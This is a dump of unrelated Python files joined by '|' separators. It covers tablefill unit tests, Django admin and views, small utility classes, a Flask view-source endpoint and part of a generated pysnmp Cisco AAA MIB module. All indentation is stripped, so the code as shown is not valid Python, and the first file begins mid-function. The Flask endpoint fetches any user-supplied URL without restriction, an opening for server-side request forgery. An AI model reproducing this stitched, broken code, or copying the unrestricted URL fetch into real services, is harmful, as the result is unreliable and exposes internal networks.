f_print_status(f_calc_status(exec_result['BEFORE_STATUS'], exec_result['AFTER_STATUS']))
exec_title_add = exec_title_add + "StatusOn" + "+"
if config.get("option", "sql_profile") == 'ON':
f_print_profiling(exec_result['PROFILING_DETAIL'], exec_result['PROFILING_SUMMARY'])
exec_title_add = exec_title_add + "ProfileOn" + "+"
f_print_time(exec_title_add, starttime, endtime)
f_print_hit(f_get_hit(dbinfo))
f_print_extr(dbinfo)
|
#! /usr/bin/env python
# ---------------------------------------------------------------------
# Tests for tablefill.py
# TODO(mauricio): Implement error codes in CLI version
from subprocess import call
import unittest
import os
import sys
sys.path.append('../')
from nostderrout import nostderrout
from tablefill import tablefill
program = 'python ../tablefill.py --silent'
class testTableFillFunction(unittest.TestCase):
def getFileNames(self):
self.input_appendix = 'input/tables_appendix.txt input/tables_appendix_two.txt'
self.input_nolabel = 'input/tables_appendix.txt input/tables_nolabel.txt'
self.input_fakeone = 'input/fake_file.txt input/tables_appendix_two.txt'
self.input_faketwo = 'input/tables_appendix.txt input/fake_file.txt'
self.texoutput = './input/tablefill_template_filled.tex'
self.lyxoutput = './input/tablefill_template_filled.lyx'
self.texoutputnodir = './input/does/not/exist/tablefill_template_filled.tex'
self.lyxoutputnodir = './input/does/not/exist/tablefill_template_filled.lyx'
self.pytemplate = 'input/tablefill_template.py'
self.blanktemplate = 'input/tablefill_template'
self.textemplate = 'input/tablefill_template.tex'
self.textemplatebreaks = 'input/tablefill_template_breaks.tex'
self.textemplatetext = '../test/input/textfill_template.tex'
self.textemplatenolab = 'input/tablefill_template_nolab.tex'
self.textemplatewrong = 'input/tablefill_template_wrong.tex'
self.lyxtemplate = 'input/tablefill_template.lyx'
self.lyxtemplatebreaks = 'input/tablefill_template_breaks.lyx'
self.lyxtemplatetext = '../test/input/textfill_template.lyx'
self.lyxtemplatenolab = 'input/tablefill_template_nolab.lyx'
self.lyxtemplatewrong = 'input/tablefill_template_wrong.lyx'
def testInput(self):
self.getFileNames()
with nostderrout():
statuslyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
output = self.lyxoutput)
statustex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
# Given my message changes length, I need to change this
# self.assertEqual(len(tag_data) + 13, len(filled_data))
# Also, Their tag comparison would be a pain to implement See
# the tests at the bottom instead
def testBreaksRoundingString(self):
self.getFileNames()
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplatebreaks,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplatebreaks,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('InvalidOperation', msgtex)
self.assertIn('InvalidOperation', msglyx)
def testIllegalSyntax(self):
self.getFileNames()
# missing arguments
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('KeyError', msgtex)
self.assertIn('KeyError', msglyx)
# Must be strings
with nostderrout():
errorlyx, msglyx = tablefill(input = [self.input_appendix],
template = self.lyxtemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = [self.input_appendix],
template = self.textemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('TypeError', msgtex)
self.assertIn('TypeError', msglyx)
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
output = 10)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
output = 10)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('TypeError', msgtex)
self.assertIn('TypeError', msglyx)
# unexpected arguments are ignored
with nostderrout():
statuslyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
waffle = "My Waffles are Best!",
output = self.lyxoutput)
statustex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
waffle = "My Waffles are Best!",
output = self.texoutput)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
def testIllegalArgs(self):
self.getFileNames()
# Must be lyx or tex
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.pytemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.blanktemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('KeyError', msgtex)
self.assertIn('KeyError', msglyx)
# But you can override if you know the file type
with nostderrout():
statustex, msgtex = tablefill(input = self.input_appendix,
template = self.pytemplate,
output = self.texoutput,
filetype = 'tex')
self.assertEqual('SUCCESS', statustex)
# non-existent output folder
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
output = self.lyxoutputnodir)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
output = self.texoutputnodir)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('IOError', msgtex)
self.assertIn('IOError', msglyx)
# non-existent input 1
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_fakeone,
template = self.lyxtemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_fakeone,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('IOError', msgtex)
self.assertIn('IOError', msglyx)
# non-existent input 2
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_faketwo,
template = self.lyxtemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_faketwo,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('IOError', msgtex)
self.assertIn('IOError', msglyx)
def testArgumentOrder(self):
self.getFileNames()
with nostderrout():
statuslyx, msglyx = tablefill(template = self.lyxtemplate,
input = self.input_appendix,
output = self.lyxoutput)
statustex, msgtex = tablefill(template = self.textemplate,
input = self.input_appendix,
output = self.texoutput)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
texfilled_data_args1 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args1 = open(self.lyxoutput, 'rU').readlines()
with nostderrout():
statuslyx, msglyx = tablefill(output = self.lyxoutput,
template = self.lyxtemplate,
input = self.input_appendix)
statustex, msgtex = tablefill(output = self.lyxoutput,
template = self.lyxtemplate,
input = self.input_appendix)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
texfilled_data_args2 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args2 = open(self.lyxoutput, 'rU').readlines()
self.assertEqual(texfilled_data_args1, texfilled_data_args2)
self.assertEqual(lyxfilled_data_args1, lyxfilled_data_args2)
# ------------------------------------------------------------------
# The following test uses three files that are WRONG but the
# original tablefill.py ignores the issues. This gives a warning.
def testMissingLabel(self):
self.getFileNames()
# Pattern outside of table
with nostderrout():
warnlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplatewrong,
output = self.lyxoutput)
warntex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplatewrong,
output = self.texoutput)
self.assertEqual('WARNING', warntex)
self.assertEqual('WARNING', warnlyx)
# No label in tables
with nostderrout():
warnlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplatenolab,
output = self.lyxoutput)
warntex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplatenolab,
output = self.texoutput)
self.assertEqual('WARNING', warntex)
self.assertEqual('WARNING', warnlyx)
# No label in template
with nostderrout():
warnlyx, msglyx = tablefill(input = self.input_nolabel,
template = self.lyxtemplate,
output = self.lyxoutput)
warntex, msgtex = tablefill(input = self.input_nolabel,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('WARNING', warntex)
self.assertEqual('WARNING', warnlyx)
class testTableFillCLI(unittest.TestCase):
def getFileNames(self):
self.input_appendix = 'input/tables_appendix.txt input/tables_appendix_two.txt'
self.input_nolabel = 'input/tables_appendix.txt input/tables_nolabel.txt'
self.input_fakeone = 'input/fake_file.txt input/tables_appendix_two.txt'
self.input_faketwo = 'input/tables_appendix.txt input/fake_file.txt'
self.texoutput = './input/tablefill_template_filled.tex'
self.lyxoutput = './input/tablefill_template_filled.lyx'
self.texoutputnodir = './input/does/not/exist/tablefill_template_filled.tex'
self.lyxoutputnodir = './input/does/not/exist/tablefill_template_filled.lyx'
self.pytemplate = 'input/tablefill_template.py'
self.blanktemplate = 'input/tablefill_template'
self.textemplate = 'input/tablefill_template.tex'
self.textemplatebreaks = 'input/tablefill_template_breaks.tex'
self.textemplatetext = '../test/input/textfill_template.tex'
self.textemplatenolab = 'input/tablefill_template_nolab.tex'
self.textemplatewrong = 'input/tablefill_template_wrong.tex'
self.lyxtemplate = 'input/tablefill_template.lyx'
self.lyxtemplatebreaks = 'input/tablefill_template_breaks.lyx'
self.lyxtemplatetext = '../test/input/textfill_template.lyx'
self.lyxtemplatenolab = 'input/tablefill_template_nolab.lyx'
self.lyxtemplatewrong = 'input/tablefill_template_wrong.lyx'
def testInput(self):
self.getFileNames()
lyxinforce = (program, self.lyxtemplate, self.input_appendix)
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutput)
lyxinforce_status = call('%s %s --input %s --force' % lyxinforce, shell = True)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
self.assertEqual(0, lyxinforce_status)
self.assertEqual(0, lyxinout_status)
texinforce = (program, self.textemplate, self.input_appendix)
texinout = (program, self.textemplate, self.input_appendix, self.texoutput)
texinforce_status = call('%s %s --input %s --force' % texinforce, shell = True)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(0, texinforce_status)
self.assertEqual(0, texinout_status)
def testBreaksRoundingString(self):
self.getFileNames()
lyxinout = (program, self.lyxtemplatebreaks, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplatebreaks, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
def testIllegalSyntax(self):
self.getFileNames()
# missing arguments
lyxinout = (program, self.lyxtemplate, self.input_appendix)
lyxinout_status = call('%s %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix)
texinout_status = call('%s %s --input %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
# unexpected arguments are give error courtesy of argparse
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s hello' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s hello' % texinout, shell = True)
self.assertEqual(2, lyxinout_status)
self.assertEqual(2, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s --waffle hi' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s --waffle hi' % texinout, shell = True)
self.assertEqual(2, lyxinout_status)
self.assertEqual(2, texinout_status)
def testIllegalArgs(self):
self.getFileNames()
lyxinout = (program, self.pytemplate, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.pytemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
texinout = (program, self.pytemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s --type tex' % texinout, shell = True)
self.assertEqual(0, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutputnodir)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix, self.texoutputnodir)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_fakeone, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_fakeone, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_faketwo, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_faketwo, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
def testArgumentOrder(self):
self.getFileNames()
lyxinout = (program, self.lyxtemplate, self.lyxoutput, self.input_appendix)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.texoutput, self.input_appendix)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(0, lyxinout_status)
self.assertEqual(0, texinout_status)
texfilled_data_args1 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args1 = open(self.lyxoutput, 'rU').readlines()
# Since input takes multiple inputs, this actually fails
lyxinout = (program, self.lyxoutput, self.input_appendix, self.lyxtemplate)
lyxinout_status = call('%s --output %s --input %s %s' % lyxinout, shell = True)
texinout = (program, self.texoutput, self.input_appendix, self.textemplate)
texinout_status = call('%s --output %s --input %s %s' % texinout, shell = True)
self.assertEqual(2, lyxinout_status)
self.assertEqual(2, texinout_status)
# But this is also OK
lyxinout = (program, self.lyxoutput, self.input_appendix, self.lyxtemplate)
lyxinout_status = call('%s --output %s --input %s --type lyx %s' % lyxinout, shell = True)
texinout = (program, self.texoutput, self.input_appendix, self.textemplate)
texinout_status = call('%s --output %s --input %s --type tex %s' % texinout, shell = True)
self.assertEqual(0, lyxinout_status)
self.assertEqual(0, texinout_status)
texfilled_data_args2 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args2 = open(self.lyxoutput, 'rU').readlines()
self.assertEqual(texfilled_data_args1, texfilled_data_args2)
self.assertEqual(lyxfilled_data_args1, lyxfilled_data_args2)
# ------------------------------------------------------------------
# The following test uses three files that are WRONG but the
# original tablefill.py ignores the issues. This gives a warning.
def testMissingLabel(self):
self.getFileNames()
lyxinout = (program, self.lyxtemplatewrong, self.lyxoutput, self.input_appendix)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplatewrong, self.texoutput, self.input_appendix)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(255, lyxinout_status)
self.assertEqual(255, texinout_status)
lyxinout = (program, self.lyxtemplatenolab, self.lyxoutput, self.input_appendix)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplatenolab, self.texoutput, self.input_appendix)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(255, lyxinout_status)
self.assertEqual(255, texinout_status)
lyxinout = (program, self.lyxtemplate, self.lyxoutput, self.input_nolabel)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.texoutput, self.input_nolabel)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(255, lyxinout_status)
self.assertEqual(255, texinout_status)
if __name__ == '__main__':
os.getcwd()
unittest.main()
|
# from import_export.admin import ImportExportModelAdmin
from django.contrib.admin import register, ModelAdmin, TabularInline
from .models import Campus, Solicitacao
class SolicitacaoInline(TabularInline):
model = Solicitacao
extra = 0
@register(Campus)
class CampusAdmin(ModelAdmin):
list_display = ['sigla', 'descricao', 'active', 'homepage']
search_fields = ['sigla', 'descricao', 'suap_id', 'url']
list_filter = ['active', 'homepage']
inlines = [SolicitacaoInline]
@register(Solicitacao)
class SolicitacaoAdmin(ModelAdmin):
list_display = ['timestamp', 'status', 'status_code', 'campus', 'resposta']
search_fields = ['campus', 'requisicao', 'requisicao_invalida', 'requisicao_header', 'resposta', 'resposta_header', 'resposta_invalida']
autocomplete_fields = ['campus']
date_hierarchy = 'timestamp'
list_filter = ['status', 'status_code', 'campus']
ordering = ('-timestamp',)
|
from .MainMenu import MainMenu
from .CategoryMenu import CategoryMenu
from .MenuTypes import MenuTypes
class FactoryMenu:
@staticmethod
def get_menu(_type: str):
if _type == MenuTypes.category:
return CategoryMenu()
elif _type == MenuTypes.main:
return MainMenu()
|
class BendVertex:
def __init__(self,time,val):
self.t = time
self.v = val
def copy(self):
return BendVertex(self.t,self.v)
def __eq__(self,other):
return self.t == other.t \
and self.v == other.v
class Bend:
def __init__(self,vertices=[]):
self.vs = list(vertices)
def copy(self):
return Bend( \
map(lambda v: v.copy(),\
self.vs))
def __eq__(self,other):
return self.vs == other.vs
|
from services.scraper import Scraper
def init_scraper_service(base_url=None, next_button_text=None,
letter_list_uri=None, letter_list_page_uri=None,
result_item_selector=None, printer=None, db=None,
*args, **kwargs) -> Scraper:
options = {
'base_url': base_url,
'next_button_text': next_button_text,
'letter_list_uri': letter_list_uri,
'letter_list_page_uri': letter_list_page_uri,
'result_item_selector': result_item_selector,
'printer': printer,
'db': db,
}
return Scraper(**options)
|
import unittest
from translator import english_to_french, french_to_english
class TestE2F(unittest.TestCase):
def test1(self):
with self.assertRaises(TypeError):
english_to_french() # pylint: disable=no-value-for-parameter
self.assertEqual(english_to_french("Hello"), "Bonjour") # test for the translation of the world 'Hello' and 'Bonjour'.
class TestF2E(unittest.TestCase):
def test1(self):
with self.assertRaises(TypeError):
french_to_english() # pylint: disable=no-value-for-parameter
self.assertEqual(french_to_english("Bonjour"), "Hello") # test for the translation of the world 'Hello' and 'Bonjour'.
unittest.main()
|
"""
Symbol
Types to represent a symbolic evaluation.
"""
from typing import NewType, Union
Constant = NewType('Constant', str)
Variable = NewType('Variable', int)
Symbol = Union[Constant, Variable]
def constant(bin_str: str) -> Constant:
"""
Transform the given binary value into a typesafe Constant.
Ensures that the input string is '0' or '1'.
:param bin_str: the binary string to be converted
:return: the Constant
:raises ValueError if the input is no binary value
"""
if bin_str in ('0', '1'):
return Constant(bin_str)
else:
raise ValueError('{0} is no constant'.format(bin_str))
def variable(var_id: int) -> Variable:
"""
Transform the given id into a typesafe Variable.
Ensures that the input is not 0.
:param var_id: the variable id to be converted
:return: the Variable
:raises ValueError if the input is not a valid id
"""
if var_id != 0:
return Variable(var_id)
else:
raise ValueError('0 cannot be used as variable')
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# author: zsun
# @Time : 2018/09/20 20:28
# @Author : Zhongyuan Sun
class Singleton(type):
def __init__(cls, name, bases, dict):
super(Singleton, cls).__init__(name, bases, dict)
cls.instance = None
def __call__(cls, *args, **kwargs):
if cls.instance is None:
cls.instance = super(Singleton, cls).__call__(*args, **kwargs)
return cls.instance
class MyClass(object):
__metaclass__ = Singleton
def __init__(self, name):
self.name = name
def pp(self):
print self.name
def main():
a = MyClass("xx")
a.pp()
b = MyClass("yy") # b.name will still be xx
b.pp()
if __name__ == "__main__":
main()
|
from flask import request, g, redirect, request, json, jsonify, Response
from viewsource import app
# import pydevd
from urllib.error import URLError
from urllib.request import urlopen, Request
from urllib.parse import urlparse
from hashlib import md5
from .helpers import beautify, file_extension, decorate_response
@app.route('/sources', methods=['GET'])
def get_source():
try:
url = request.args.get('url')
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/51.0.2704.103 Safari/537.36'
}
response = urlopen(Request(url, headers=headers, method='GET'))
charset = response.info().get_charset()
decoded_source = response.read().decode(charset) if charset else response.read().decode('latin1')
extension = file_extension(urlparse(url).path)
try:
content_type = response.headers['Content-Type'] or 'text/html' if not extension else None
decoded_source = beautify(decoded_source, content_type, extension)
except SyntaxError:
pass
response = jsonify({'data': {'id': md5(url.encode('utf-8')).hexdigest(), 'type': 'sources',
'attributes': {'source_code': decoded_source}}})
""":type: Response"""
decorate_response(response)
return response
except (URLError, ValueError) as e:
fully_qualified_tmpl = 'Please enter a fully qualified URL: {0}'
please_check_tmpl = 'Please check URL: {0}'
error = fully_qualified_tmpl.format(url) if isinstance(e, ValueError) else please_check_tmpl.format(url)
response = jsonify(
{'errors': [{'status': 400, 'title': 'URL Error', 'detail': error}]})
decorate_response(response)
return response, 400
|
from django.shortcuts import render
from .models import *
# Create your views here.
def users(request):
Users = User_Model.objects.all()
return render(request,'users.html',{'users':Users})
|
from django.apps import AppConfig
class FinanceAppConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'finance_app'
|
#
# PySNMP MIB module CISCO-UNIFIED-COMPUTING-AAA-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-UNIFIED-COMPUTING-AAA-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:58:20 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
CiscoAlarmSeverity, TimeIntervalSec, CiscoNetworkAddress, Unsigned64, CiscoInetAddressMask = mibBuilder.importSymbols("CISCO-TC", "CiscoAlarmSeverity", "TimeIntervalSec", "CiscoNetworkAddress", "Unsigned64", "CiscoInetAddressMask")
CucsManagedObjectId, CucsManagedObjectDn, ciscoUnifiedComputingMIBObjects = mibBuilder.importSymbols("CISCO-UNIFIED-COMPUTING-MIB", "CucsManagedObjectId", "CucsManagedObjectDn", "ciscoUnifiedComputingMIBObjects")
CucsAaaEpFsmStageName, CucsNetworkSwitchId, CucsAaaTacacsPlusEpFsmStageName, CucsAaaUserEpFsmTaskItem, CucsConditionCause, CucsAaaAuthRealmFsmCurrentFsm, CucsAaaAccess, CucsAaaLdapEpFsmStageName, CucsAaaPwdPolicy, CucsAaaTacacsPlusEpFsmCurrentFsm, CucsConditionActionIndicator, CucsAaaRealmFsmTaskItem, CucsAaaRealmFsmCurrentFsm, CucsAaaUserInterface, CucsPolicyPolicyOwner, CucsAaaUserEpFsmStageName, CucsFsmCompletion, CucsAaaRealm, CucsAaaEpFsmCurrentFsm, CucsAaaLdapGroupRuleAuthorization, CucsConditionSeverity, CucsAaaAccountStatus, CucsFsmFsmStageStatus, CucsAaaRadiusEpFsmCurrentFsm, CucsAaaNoRolePolicy, CucsAaaRadiusEpFsmStageName, CucsAaaUserEpFsmCurrentFsm, CucsAaaRadiusService, CucsAaaDomainAuthRealm, CucsAaaSessionState, CucsAaaEpAccess, CucsAaaSshStr, CucsAaaConfigState, CucsConditionRemoteInvRslt, CucsAaaLdapGroupRuleTraversal, CucsAaaRealmFsmStageName, CucsConditionCode, CucsAaaLdapVendor, CucsFsmFlags, CucsAaaExtMgmtAccess, CucsAaaClear, CucsAaaAuthRealmFsmStageName, CucsAaaIpmiOverLan, CucsAaaCimcSessionType, CucsAaaLdapEpFsmCurrentFsm, CucsAaaEpFsmTaskItem, CucsAaaSession = mibBuilder.importSymbols("CISCO-UNIFIED-COMPUTING-TC-MIB", "CucsAaaEpFsmStageName", "CucsNetworkSwitchId", "CucsAaaTacacsPlusEpFsmStageName", "CucsAaaUserEpFsmTaskItem", "CucsConditionCause", "CucsAaaAuthRealmFsmCurrentFsm", "CucsAaaAccess", "CucsAaaLdapEpFsmStageName", "CucsAaaPwdPolicy", "CucsAaaTacacsPlusEpFsmCurrentFsm", "CucsConditionActionIndicator", "CucsAaaRealmFsmTaskItem", "CucsAaaRealmFsmCurrentFsm", "CucsAaaUserInterface", "CucsPolicyPolicyOwner", "CucsAaaUserEpFsmStageName", "CucsFsmCompletion", "CucsAaaRealm", "CucsAaaEpFsmCurrentFsm", "CucsAaaLdapGroupRuleAuthorization", "CucsConditionSeverity", "CucsAaaAccountStatus", "CucsFsmFsmStageStatus", "CucsAaaRadiusEpFsmCurrentFsm", "CucsAaaNoRolePolicy", "CucsAaaRadiusEpFsmStageName", "CucsAaaUserEpFsmCurrentFsm", "CucsAaaRadiusService", "CucsAaaDomainAuthRealm", "CucsAaaSessionState", "CucsAaaEpAccess", "CucsAaaSshStr", "CucsAaaConfigState", "CucsConditionRemoteInvRslt", "CucsAaaLdapGroupRuleTraversal", "CucsAaaRealmFsmStageName", "CucsConditionCode", "CucsAaaLdapVendor", "CucsFsmFlags", "CucsAaaExtMgmtAccess", "CucsAaaClear", "CucsAaaAuthRealmFsmStageName", "CucsAaaIpmiOverLan", "CucsAaaCimcSessionType", "CucsAaaLdapEpFsmCurrentFsm", "CucsAaaEpFsmTaskItem", "CucsAaaSession")
InetAddressIPv6, InetAddressIPv4 = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddressIPv6", "InetAddressIPv4")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, Counter64, NotificationType, TimeTicks, ModuleIdentity, iso, Integer32, Gauge32, Unsigned32, Counter32, Bits, MibIdentifier, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Counter64", "NotificationType", "TimeTicks", "ModuleIdentity", "iso", "Integer32", "Gauge32", "Unsigned32", "Counter32", "Bits", "MibIdentifier", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
DateAndTime, MacAddress, RowPointer, TruthValue, TimeStamp, TextualConvention, TimeInterval, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "DateAndTime", "MacAddress", "RowPointer", "TruthValue", "TimeStamp", "TextualConvention", "TimeInterval", "DisplayString")
cucsAaaObjects = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2))
if mibBuilder.loadTexts: cucsAaaObjects.setLastUpdated('201601180000Z')
if mibBuilder.loadTexts: cucsAaaObjects.setOrganization('Cisco Systems Inc.')
cucsAaaAuthRealmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1), )
if mibBuilder.loadTexts: cucsAaaAuthRealmTable.setStatus('current')
cucsAaaAuthRealmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaAuthRealmInstanceId"))
if mibBuilder.loadTexts: cucsAaaAuthRealmEntry.setStatus('current')
cucsAaaAuthRealmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaAuthRealmInstanceId.setStatus('current')
cucsAaaAuthRealmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDn.setStatus('current')
cucsAaaAuthRealmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmRn.setStatus('current')
cucsAaaAuthRealmConLogin = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 4), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmConLogin.setStatus('current')
cucsAaaAuthRealmDefLogin = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 5), CucsAaaRealm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDefLogin.setStatus('current')
cucsAaaAuthRealmDefRolePolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 6), CucsAaaNoRolePolicy()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDefRolePolicy.setStatus('current')
cucsAaaAuthRealmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmDescr.setStatus('current')
cucsAaaAuthRealmFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 1, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaAuthRealmFsmDescr.setStatus('current')
